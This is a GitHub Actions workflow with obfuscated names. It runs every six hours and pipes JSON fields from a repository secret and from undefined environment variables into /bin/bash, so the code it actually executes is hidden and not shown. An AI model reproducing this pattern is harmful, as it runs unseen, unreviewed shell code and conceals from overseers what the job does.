name: peixuan19871010
on:
  workflow_dispatch:
  schedule:
    - cron: '21 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: peixuan19871010
        env:
          ukil3: ${{ secrets.ukil3 }}
        run: |
          echo $ukil3 | jq -r .mcmum431 | /bin/bash
          echo $mpcbv7446 | jq -r .ytzps7232 | /bin/bash
          echo $ww7978 | jq -r .rf652 | /bin/bash
          echo $f86470 | jq -r .kbp3 | /bin/bash
          echo $kzrvv82443 | jq -r .jd80 | /bin/bash

